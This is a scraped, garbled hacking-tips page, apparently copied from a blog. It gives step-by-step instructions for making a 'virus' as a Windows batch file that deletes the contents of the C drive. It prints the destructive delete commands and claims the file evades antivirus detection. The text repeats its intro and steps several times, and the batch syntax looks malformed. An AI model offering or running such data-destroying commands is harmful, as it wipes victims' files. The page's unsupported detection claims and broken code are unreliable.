What will this virus do?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.
How to make this virus?
You
will create this virus using batch file programming. This virus will
delete the C Drive completely. The good thing about this virus is that
it is not detected by antivirus. - See more at:
http://www.coolhackingtrick.com/2012/12/learn-to-make-dangerous-virus-in-minute.html#sthash.1opYhCPl.dpuf
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. we will not be responsible for any damage done to your computer.
1. Open Notepad and copy below code into it.
You
will create this virus using batch file programming. This virus will
delete the C Drive completely. The good thing about this virus is that
it is not detected by antivirus. - See more at:
http://www.coolhackingtrick.com/2012/12/learn-to-make-dangerous-virus-in-minute.html#sthash.1opYhCPl.dpuf
You
will create this virus using batch file programming. This virus will
delete the C Drive completely. The good thing about this virus is that
it is not detected by antivirus. - See more at:
http://www.coolhackingtrick.com/2012/12/learn-to-make-dangerous-virus-in-minute.html#sthash.1opYhCPl.dpuf
Post a Comment